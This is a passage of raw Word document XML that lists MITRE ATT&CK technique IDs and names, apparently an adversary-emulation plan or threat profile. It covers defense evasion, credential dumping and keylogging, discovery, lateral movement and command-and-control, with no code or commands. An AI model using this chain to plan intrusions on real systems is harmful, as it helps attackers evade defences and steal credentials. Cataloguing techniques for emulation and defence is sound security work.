          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530C9DC"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBCC168"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73548D5E"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC04025"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T1546.008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Accessibility Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23697B9F"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1036.004', 'T1218.011', 'T1574.001', 'T1574.006', 'T1480.001', 'T1197', 'T1027', 'T1574.002', 'T1070.004', 'T1218.001', 'T1055', 'T1070.003', 'T1112', 'T1070.001', 'T1078', 'T1036.005', 'T1542.003', 'T1014', 'T1553.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B854BC" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRPr="00C1675A" w:rsidRDefault="00CC70C1" w:rsidP="00860DC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C1675A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1036.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C1675A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Masquerade Task or Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A977F32"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T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F78546"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T1574.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Search Order Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C07552"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1574.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:Dynamic Linker Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6188AF"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8E1DB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1480.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E1DB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Execution Guardrails&gt;:Environmental Keying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C561E6"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1197 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> BITS Jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03499F38"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r w:rsidRPr="00C1675A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C1675A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C1675A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6DDD4B"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF57B3"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64642326"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T1218.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Compiled HTML File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A560B0"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1055 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137B31C2"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T1070.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:Clear Command History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78308FA7"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1112 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Modify Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A03F200"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T1070.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:Clear Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467DF6B"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2B143"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T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C872351"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T1542.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Pre-OS Boot&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2762BB4F"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1014 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Rootkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B89A39"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T1553.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Subvert Trust Controls&gt;:Code Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72012BFC"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1056.001', 'T1003.001', 'T1110.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320153FD"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FFEB0C"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T1003.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSASS Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE918E8"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T1110.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Brute Force&gt;:Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6D4557"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1083', 'T1135', 'T1049', 'T1016', 'T1033', 'T1046']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2709D1E8" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRPr="002B5C71" w:rsidRDefault="00CC70C1" w:rsidP="00860DC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5C71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B5C71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B5C71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC666B5"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1135 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Share Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5EF4C9"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1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E1A45A" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRPr="006A7E42" w:rsidRDefault="00CC70C1" w:rsidP="00860DC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A7E42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A7E42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086AE8AA"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1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086C7EAE"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1046 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4544802C"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1021.002', 'T1021.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF60334"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T1021.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SMB/Windows Admin Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5DF52"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T1021.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB52953"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1005', 'T1560.001', 'T1056.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFF3B81"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1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469AA259"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T1560.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35530C0C"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E01E86C"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1071.001', 'T1071.002', 'T1104', 'T1105', 'T1008', 'T1071.004', 'T1102.001', 'T1568.002', 'T1090']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3E5CB0"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T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0576A388"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T1071.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:File Transfer Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C58D8"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1104 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Multi-Stage Channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E993866"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1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37158A68"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1008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Fallback Channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506B7A18" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRPr="002B5C71" w:rsidRDefault="00CC70C1" w:rsidP="00860DC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B5C71">
        <w:rPr>
